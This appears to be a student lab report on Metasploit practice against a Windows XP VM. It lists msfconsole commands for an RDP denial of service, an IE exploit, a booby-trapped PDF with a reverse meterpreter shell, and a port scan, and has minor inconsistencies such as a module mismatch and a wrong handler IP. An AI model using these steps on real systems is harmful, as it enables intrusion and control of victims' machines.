1. 程式人生 > 其它 >192405實驗六 Metasploit攻擊滲透實踐

192405實驗六 Metasploit攻擊滲透實踐

實驗六 Metasploit攻擊滲透實踐

目錄

實驗六 Metasploit攻擊滲透實踐

1.實驗內容及要求

1.實驗內容及要求

本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

1.1一個主動攻擊實踐,儘量使用最新的類似漏洞;

1.2 一個針對瀏覽器的攻擊,儘量使用最新的類似漏洞;

1.3 一個針對客戶端的攻擊,如Adobe或office,儘量使用最新的類似漏洞;

1.4 成功應用任何一個輔助模組。

2.實驗相關知識點

MSF是一個免費的、可下載的框架,通過它可以很容易地獲取、開發並對計算機軟體漏洞實施攻擊。它本身附帶數百個已知軟體漏洞的專業級漏洞攻擊工具。

  • MSF的六個模組:
    檢視六種模組原始碼目錄/usr/share/metasploit-framework/modules
    滲透攻擊模組Exploit Modules:攻擊漏洞,把shellcode"背"過去
    輔助模組Auxiliary Modules
    :在進行滲透攻擊之前得到目標系統豐富的情報資訊,它是攻擊的前提
    攻擊載荷Payload Modules:載荷,一段指令(shellcode),目標系統在被滲透攻擊之後去執行的程式碼
    空欄位模組Nop Modules
    編碼模組Encoders
    後滲透攻擊模組Post:攻擊成功之後,動態傳輸程式碼使其在被控機執行

MSF常用漏洞利用命令:

 search name :用指定關鍵字搜尋可以利用的漏洞模組
 use exploit name :使用漏洞
 show options :顯示配置選項
 set TARGET target number :設定目標版本
 exploit :開始漏洞攻擊
 sessions -l :列出會話
 sessions -i id :選擇會話
 sessions -k id :結束會話
 Ctrl+z :把會話放到後臺
 Ctrl+c :結束會話

3.實驗過程

1.主動攻擊實踐

1.攻擊方式:使用ms12-020進行攻擊

漏洞名:MS12-020(全稱:Microsoft windows遠端桌面協議RDP遠端程式碼執行漏洞,RDP協議是一個多通道的協議,讓使用者連上提供微軟終端機服務的電腦。 windows在處理某些物件時存在錯誤,可通過特製的RDP報文訪問未初始化或已經刪除的物件,導致任意程式碼執行。 然後控制系統。

靶機:Windows XP
具體步驟:
Windows xp的IP:192.168.80.131

kali 的 192.168.80.129,

XPping一下kali

![image-20220509103321874](

使用msfconsole進行攻擊

msfconsole 

search ms12-020 

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 

show options 

set rhost 192.168.80.131

run

2、一個針對瀏覽器的攻擊,儘量使用最新的類似漏洞

使用ms14-064進行攻擊

use exploit/windows/browser/ms10_018_ie_behaviors 
set payload windows/meterpreter/bind_tcp 
set RHOST 192.168.80.131 
set target 0 
exploit

![](實驗六 Metasploit攻擊滲透實踐.assets/1824537-20220515161554233-1564502669-16526029719034.png)

在靶機瀏覽器中輸入http://192.168.80.129:8080/W4xAzyDjs7gX
網頁會從0跑到100,然後瀏覽器會無法響應
![img](實驗六 Metasploit攻擊滲透實踐.assets/1812347-20220503190910816-1126307890.png)
輸入sessions -i 2進入靶機(shell路徑和上次不一樣),輸入ver檢視系統版本,dir查詢目錄
![img](實驗六 Metasploit攻擊滲透實踐.assets/1812347-20220503191126904-852821668.png)
靶機的IE瀏覽器就陷入崩潰,關不掉了

3、一個針對客戶端的攻擊,如Adobe或office,儘量使用最新的類似漏洞

使用adobe_cooltype_sing進行攻擊

use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.80.129
set LPORT 1221
set FILENAME 20192405.pdf
set target 0
exploit

啟動監聽,並在靶機開啟pdf檔案

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.80.131
set LPORT 11223
exploit

![](實驗六 Metasploit攻擊滲透實踐.assets/1824537-20220515163738789-1292453191.png)

4、成功應用任何一個輔助模組

使用SYN埠掃描模組

search portscan
use auxiliary/scanner/portscan/syn
show options
set RHOST 192.168.80.131
set THREADS 50
run

通過埠掃描,可以發現對方開啟的埠服務,我們可以根據這些埠服務判斷是否存在漏洞,例如3389對應一開始的ms12-020漏洞。

![](實驗六 Metasploit攻擊滲透實踐.assets/1824537-20220515164113030-1589391354.png)

問題

ms12-020利用的漏洞很老,要8以上才能攻擊,而且xp要開啟接受遠端控制(如下圖)才可以成功

實驗體會

這實驗花費了比較長的時間,在做攻擊客戶端的漏洞時,由於我的xp系統沒有裝Adobe和office這些軟體,需要重新在網上下載安裝,安裝之後又發現新版的軟體已經把漏洞修復了,所以我又不得不去尋找更加早期的版本,比較麻煩。同時,對相關軟體有漏洞補丁需要更新時,一定要及時更新這件事有了更加深刻的體驗,補丁打慢了,可能就會被不法分子利用漏洞控制主機。實驗中的主機可以說都是處於關閉防毒軟體和防火牆的情況下進行的,但是實戰中根本不可能會有機會關閉對方電腦的。所以說,我們需要去尋找一些目前還尚未被修復的漏洞,否則攻擊成功的機會是微乎其微。同時,社工也是很重要的一環,合理而有效的社工會大幅度降低實戰的難度